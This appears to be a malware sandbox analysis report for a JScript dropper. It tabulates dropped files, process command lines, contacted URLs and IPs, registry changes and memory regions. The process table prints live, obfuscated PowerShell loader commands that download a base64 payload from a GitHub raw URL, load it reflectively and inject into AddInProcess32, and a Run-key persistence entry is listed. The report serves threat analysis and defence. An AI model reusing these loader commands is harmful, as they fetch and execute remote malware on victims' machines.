Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
scan_374783.js
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
||
C:\ProgramData\alcatifa.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dogn2cd.zn2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ic5ghhj4.ehf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pm4ykldh.vlu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwllnwfg.lai.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAGwAQQBjAGUAIAAgACgAWwBDAGgAYQBSAF0ANgA2ACsAWwBDAGgAYQBSAF0ANAA4ACsAWwBDAGgAYQBSAF0ANQA2ACkALABbAEMAaABhAFIAXQAzADYAIAAgAC0AUgBlAFAAbABBAGMAZQAgACAAKABbAEMAaABhAFIAXQA4ADQAKwBbAEMAaABhAFIAXQA1ADIAKwBbAEMAaABhAFIAXQAxADIAMQApACwAWwBDAGgAYQBSAF0AOQAyACkAfAAuACgAIAAoAFsAcwBUAFIAaQBuAEcAXQAkAFYAZQBSAEIAbwBTAGUAcAByAGUARgBlAHIARQBOAGMAZQApAFsAMQAsADMAXQArACcAWAAnAC0ASgBPAGkAbgAnACcAKQA=';$OWjuxD
= [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden
-executionpolicy bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I;
B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+');
B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent);
'+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+'
pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)')
-CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36
-RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://paste.ee/
|
unknown
|
||
https://paste.ee/d/gvOd3
|
188.114.97.3
|
||
http://paste.ee/d/gvOd3
|
unknown
|
||
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
|
185.199.110.133
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
https://paste.ee:443/d/gvOd3
|
unknown
|
||
https://account.dyn.com/
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
https://paste.ee/d/gvOd3ee/dD
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://www.google.com;
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://raw.githubusercont
|
unknown
|
||
https://analytics.paste.ee
|
unknown
|
||
http://ip-api.comp
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://paste.ee/zD
|
unknown
|
||
https://www.google.com
|
unknown
|
||
https://raw.githubusercontent.com
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://ip-api.com
|
unknown
|
||
http://raw.githubusercontent.com
|
unknown
|
||
https://oneget.orgX
|
unknown
|
||
https://analytics.paste.ee;
|
unknown
|
||
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtC7I;
|
unknown
|
||
https://cdnjs.cloudflare.com
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://cdnjs.cloudflare.com;
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://secure.gravatar.com
|
unknown
|
||
https://themes.googleusercontent.com
|
unknown
|
||
https://oneget.org
|
unknown
|
||
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
||
https://paste.ee/d/gvOd3t
|
unknown
|
There are 28 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
paste.ee
|
188.114.97.3
|
||
ip-api.com
|
208.95.112.1
|
||
raw.githubusercontent.com
|
185.199.110.133
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
208.95.112.1
|
ip-api.com
|
United States
|
||
188.114.97.3
|
paste.ee
|
European Union
|
||
185.199.110.133
|
raw.githubusercontent.com
|
Netherlands
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Path
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileDirectory
|
There are 21 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
402000
|
remote allocation
|
page execute and read and write
|
||
27D1101C000
|
trusted library allocation
|
page read and write
|
||
6440000
|
trusted library allocation
|
page read and write
|
||
1D52EE43000
|
heap
|
page read and write
|
||
90B83FE000
|
stack
|
page read and write
|
||
7FFAAC603000
|
trusted library allocation
|
page read and write
|
||
1D52D4D0000
|
heap
|
page read and write
|
||
1D52F696000
|
heap
|
page read and write
|
||
4FB0000
|
trusted library allocation
|
page read and write
|
||
1D52EE89000
|
heap
|
page read and write
|
||
7FFB1DE00000
|
unkown
|
page readonly
|
||
1FFE3E70000
|
heap
|
page read and write
|
||
7FFAAC4F0000
|
trusted library allocation
|
page read and write
|
||
1D52EE5D000
|
heap
|
page read and write
|
||
27D01D25000
|
trusted library allocation
|
page read and write
|
||
1D52F63E000
|
heap
|
page read and write
|
||
20091BDD000
|
heap
|
page read and write
|
||
1D52F6A9000
|
heap
|
page read and write
|
||
27D00570000
|
trusted library allocation
|
page read and write
|
||
63E0000
|
heap
|
page read and write
|
||
1C6D6210000
|
heap
|
page read and write
|
||
90B84FE000
|
stack
|
page read and write
|
||
1D52F65E000
|
heap
|
page read and write
|
||
7FFAAC490000
|
trusted library allocation
|
page read and write
|
||
1C6D6370000
|
heap
|
page read and write
|
||
9A500FE000
|
unkown
|
page read and write
|
||
1C6D631F000
|
heap
|
page read and write
|
||
C2D29A3000
|
stack
|
page read and write
|
||
1D52F67C000
|
heap
|
page read and write
|
||
27D0175D000
|
trusted library allocation
|
page read and write
|
||
1D52EE83000
|
heap
|
page read and write
|
||
73D01000
|
unkown
|
page execute read
|
||
1C6D6377000
|
heap
|
page read and write
|
||
7FFAAC430000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC27B000
|
trusted library allocation
|
page read and write
|
||
113E000
|
stack
|
page read and write
|
||
1D52F6AC000
|
heap
|
page read and write
|
||
1C6D66E5000
|
heap
|
page read and write
|
||
20091C90000
|
heap
|
page read and write
|
||
1D52EECF000
|
heap
|
page read and write
|
||
1D52F654000
|
heap
|
page read and write
|
||
20091B97000
|
heap
|
page read and write
|
||
27D01D21000
|
trusted library allocation
|
page read and write
|
||
27D01685000
|
trusted library allocation
|
page read and write
|
||
1D52D429000
|
heap
|
page read and write
|
||
1D52EE9F000
|
heap
|
page read and write
|
||
27D00001000
|
trusted library allocation
|
page read and write
|
||
7FFAAC452000
|
trusted library allocation
|
page read and write
|
||
1D52F352000
|
heap
|
page read and write
|
||
2BA8000
|
trusted library allocation
|
page read and write
|
||
1D52EE90000
|
heap
|
page read and write
|
||
1FFE5DAA000
|
trusted library allocation
|
page read and write
|
||
7FFAAC470000
|
trusted library allocation
|
page read and write
|
||
1FFE3EAF000
|
heap
|
page read and write
|
||
27D73960000
|
heap
|
page execute and read and write
|
||
1D52F5F6000
|
heap
|
page read and write
|
||
27D0170C000
|
trusted library allocation
|
page read and write
|
||
27D01C5C000
|
trusted library allocation
|
page read and write
|
||
1D52F63F000
|
heap
|
page read and write
|
||
7FFAAC4A0000
|
trusted library allocation
|
page read and write
|
||
1D52F67E000
|
heap
|
page read and write
|
||
1D52EEA9000
|
heap
|
page read and write
|
||
2008FF55000
|
heap
|
page read and write
|
||
1D52EEB4000
|
heap
|
page read and write
|
||
1D52F647000
|
heap
|
page read and write
|
||
1D52EE70000
|
heap
|
page read and write
|
||
1D52EE6E000
|
heap
|
page read and write
|
||
F6C000
|
heap
|
page read and write
|
||
27D003FB000
|
trusted library allocation
|
page read and write
|
||
612D000
|
stack
|
page read and write
|
||
1FFE3DF0000
|
heap
|
page read and write
|
||
20091BB8000
|
heap
|
page read and write
|
||
1D52EE66000
|
heap
|
page read and write
|
||
1D52F64C000
|
heap
|
page read and write
|
||
1D52F609000
|
heap
|
page read and write
|
||
1D52F685000
|
heap
|
page read and write
|
||
73D1D000
|
unkown
|
page read and write
|
||
1D52F6B0000
|
heap
|
page read and write
|
||
1D52F648000
|
heap
|
page read and write
|
||
1D52EEA4000
|
heap
|
page read and write
|
||
1D52F69E000
|
heap
|
page read and write
|
||
27D00F80000
|
trusted library allocation
|
page read and write
|
||
1D52F64E000
|
heap
|
page read and write
|
||
1D52EEB9000
|
heap
|
page read and write
|
||
2008FB9B000
|
heap
|
page read and write
|
||
626E000
|
stack
|
page read and write
|
||
1D52F633000
|
heap
|
page read and write
|
||
1D52EECF000
|
heap
|
page read and write
|
||
1D52F645000
|
heap
|
page read and write
|
||
7FFAAC530000
|
trusted library allocation
|
page read and write
|
||
2AAD000
|
trusted library allocation
|
page read and write
|
||
1FFFDE17000
|
heap
|
page execute and read and write
|
||
7FFAAC390000
|
trusted library allocation
|
page execute and read and write
|
||
1D52D45C000
|
heap
|
page read and write
|
||
27D754C2000
|
trusted library allocation
|
page read and write
|
||
292C000
|
stack
|
page read and write
|
||
7FFAAC510000
|
trusted library allocation
|
page read and write
|
||
1D52F655000
|
heap
|
page read and write
|
||
1D52EE7C000
|
heap
|
page read and write
|
||
26F65394000
|
heap
|
page read and write
|
||
B58000
|
stack
|
page read and write
|
||
C2D2F7F000
|
stack
|
page read and write
|
||
1C6D6315000
|
heap
|
page read and write
|
||
1D52F5F7000
|
heap
|
page read and write
|
||
7FFAAC5B0000
|
trusted library allocation
|
page read and write
|
||
1D52D670000
|
heap
|
page read and write
|
||
1D52D4BD000
|
heap
|
page read and write
|
||
C2D2CFE000
|
stack
|
page read and write
|
||
1FFE5DAD000
|
trusted library allocation
|
page read and write
|
||
1FFFDCFA000
|
heap
|
page read and write
|
||
1FFE5DF8000
|
trusted library allocation
|
page read and write
|
||
27D75680000
|
heap
|
page read and write
|
||
1D52F645000
|
heap
|
page read and write
|
||
7FFAAC60B000
|
trusted library allocation
|
page read and write
|
||
1D52EE7B000
|
heap
|
page read and write
|
||
1D52F6B6000
|
heap
|
page read and write
|
||
20091BB0000
|
heap
|
page read and write
|
||
1C6D43F8000
|
heap
|
page read and write
|
||
27D0172C000
|
trusted library allocation
|
page read and write
|
||
1C6D6350000
|
heap
|
page read and write
|
||
1D52F6BE000
|
heap
|
page read and write
|
||
26F653C0000
|
direct allocation
|
page read and write
|
||
540F000
|
stack
|
page read and write
|
||
20091B96000
|
heap
|
page read and write
|
||
1D52F678000
|
heap
|
page read and write
|
||
C2D307E000
|
stack
|
page read and write
|
||
7FFB1DE16000
|
unkown
|
page readonly
|
||
1D52F677000
|
heap
|
page read and write
|
||
1FFE57B4000
|
heap
|
page read and write
|
||
1D52D4C7000
|
heap
|
page read and write
|
||
1D52F7DE000
|
heap
|
page read and write
|
||
27D7372A000
|
heap
|
page read and write
|
||
AED13FE000
|
stack
|
page read and write
|
||
1D52F5F9000
|
heap
|
page read and write
|
||
1D52F656000
|
heap
|
page read and write
|
||
7FFAAC530000
|
trusted library allocation
|
page read and write
|
||
1FFFDCF0000
|
heap
|
page read and write
|
||
1FFFDD3A000
|
heap
|
page read and write
|
||
1D52D3D0000
|
heap
|
page read and write
|
||
1C6D6811000
|
heap
|
page read and write
|
||
20091B65000
|
heap
|
page read and write
|
||
2008FD50000
|
heap
|
page read and write
|
||
1D52F336000
|
heap
|
page read and write
|
||
39723FE000
|
stack
|
page read and write
|
||
1D52EE9A000
|
heap
|
page read and write
|
||
1FFE3E63000
|
heap
|
page read and write
|
||
1FFE60C3000
|
trusted library allocation
|
page read and write
|
||
664A8FE000
|
stack
|
page read and write
|
||
10F0000
|
trusted library allocation
|
page read and write
|
||
27D00404000
|
trusted library allocation
|
page read and write
|
||
7FFAAC590000
|
trusted library allocation
|
page read and write
|
||
20092096000
|
heap
|
page read and write
|
||
EC5000
|
heap
|
page read and write
|
||
26F653A0000
|
heap
|
page read and write
|
||
7FFB1DE22000
|
unkown
|
page readonly
|
||
1FFE5FB0000
|
trusted library allocation
|
page read and write
|
||
1D52F65A000
|
heap
|
page read and write
|
||
AED1637000
|
stack
|
page read and write
|
||
1D52F590000
|
remote allocation
|
page read and write
|
||
27D754C0000
|
trusted library allocation
|
page read and write
|
||
2BBE000
|
trusted library allocation
|
page read and write
|
||
39727FF000
|
stack
|
page read and write
|
||
554D000
|
stack
|
page read and write
|
||
50C0000
|
heap
|
page read and write
|
||
1D52F677000
|
heap
|
page read and write
|
||
7FFAAC440000
|
trusted library allocation
|
page execute and read and write
|
||
27D1029C000
|
trusted library allocation
|
page read and write
|
||
7FFB23B22000
|
unkown
|
page readonly
|
||
1C6D442D000
|
heap
|
page read and write
|
||
1C6D6211000
|
heap
|
page read and write
|
||
CA0000
|
heap
|
page read and write
|
||
7FFAAC480000
|
trusted library allocation
|
page read and write
|
||
1C6D637A000
|
heap
|
page read and write
|
||
10A3000
|
trusted library allocation
|
page execute and read and write
|
||
2B90000
|
trusted library allocation
|
page read and write
|
||
550E000
|
stack
|
page read and write
|
||
1D52F663000
|
heap
|
page read and write
|
||
5790000
|
heap
|
page read and write
|
||
20091C95000
|
heap
|
page read and write
|
||
1D52EEA9000
|
heap
|
page read and write
|
||
AED12FE000
|
stack
|
page read and write
|
||
20091B9C000
|
heap
|
page read and write
|
||
1FFE61CA000
|
trusted library allocation
|
page read and write
|
||
1D52F62C000
|
heap
|
page read and write
|
||
1FFE5710000
|
heap
|
page readonly
|
||
1D52EEB4000
|
heap
|
page read and write
|
||
1D52F626000
|
heap
|
page read and write
|
||
1D52EEB9000
|
heap
|
page read and write
|
||
39722FA000
|
stack
|
page read and write
|
||
1D52D4C6000
|
heap
|
page read and write
|
||
27D739A4000
|
heap
|
page read and write
|
||
1D52EE7E000
|
heap
|
page read and write
|
||
1FFE5D2A000
|
trusted library allocation
|
page read and write
|
||
1D52D41A000
|
heap
|
page read and write
|
||
1D52D4AE000
|
heap
|
page read and write
|
||
50B0000
|
heap
|
page read and write
|
||
1D52F437000
|
heap
|
page read and write
|
||
1C6D6411000
|
heap
|
page read and write
|
||
664A7FE000
|
stack
|
page read and write
|
||
7FFB1DE20000
|
unkown
|
page read and write
|
||
2008FB68000
|
heap
|
page read and write
|
||
7FFB23B25000
|
unkown
|
page readonly
|
||
1D52F673000
|
heap
|
page read and write
|
||
7FFAAC590000
|
trusted library allocation
|
page read and write
|
||
664AAFF000
|
stack
|
page read and write
|
||
7FFAAC420000
|
trusted library allocation
|
page execute and read and write
|
||
F03000
|
heap
|
page read and write
|
||
1D52F5E0000
|
heap
|
page read and write
|
||
1D52F43D000
|
heap
|
page read and write
|
||
1D52EFE0000
|
heap
|
page read and write
|
||
1D52F432000
|
heap
|
page read and write
|
||
1D52D4B1000
|
heap
|
page read and write
|
||
2008FD70000
|
heap
|
page read and write
|
||
2A8B000
|
trusted library allocation
|
page read and write
|
||
1D52EE46000
|
heap
|
page read and write
|
||
1D52D490000
|
heap
|
page read and write
|
||
7FFB1DE16000
|
unkown
|
page readonly
|
||
7FFAAC500000
|
trusted library allocation
|
page read and write
|
||
1D52F5F9000
|
heap
|
page read and write
|
||
1D52D4BD000
|
heap
|
page read and write
|
||
1D52D4DB000
|
heap
|
page read and write
|
||
AED0F73000
|
stack
|
page read and write
|
||
1D52F7F6000
|
heap
|
page read and write
|
||
1D52D477000
|
heap
|
page read and write
|
||
20091B7B000
|
heap
|
page read and write
|
||
3972BFE000
|
stack
|
page read and write
|
||
1D52EE4F000
|
heap
|
page read and write
|
||
1D52F639000
|
heap
|
page read and write
|
||
1D52F590000
|
remote allocation
|
page read and write
|
||
1D52F654000
|
heap
|
page read and write
|
||
1D52EE46000
|
heap
|
page read and write
|
||
1FFE5720000
|
trusted library allocation
|
page read and write
|
||
7FFAAC520000
|
trusted library allocation
|
page read and write
|
||
27D7373F000
|
heap
|
page read and write
|
||
20091B90000
|
heap
|
page read and write
|
||
1D52D458000
|
heap
|
page read and write
|
||
1D52F334000
|
heap
|
page read and write
|
||
1D52F352000
|
heap
|
page read and write
|
||
27D737D4000
|
heap
|
page read and write
|
||
1D52EF09000
|
heap
|
page read and write
|
||
1D52EE6B000
|
heap
|
page read and write
|
||
1D52EEA4000
|
heap
|
page read and write
|
||
20091BD1000
|
heap
|
page read and write
|
||
27D003EF000
|
trusted library allocation
|
page read and write
|
||
1D52D675000
|
heap
|
page read and write
|
||
E60000
|
heap
|
page read and write
|
||
1C6D6379000
|
heap
|
page read and write
|
||
1D52F7F7000
|
heap
|
page read and write
|
||
2960000
|
trusted library allocation
|
page read and write
|
||
1C6D637A000
|
heap
|
page read and write
|
||
1FFE5CC4000
|
trusted library allocation
|
page read and write
|
||
1D52F633000
|
heap
|
page read and write
|
||
AED127E000
|
stack
|
page read and write
|
||
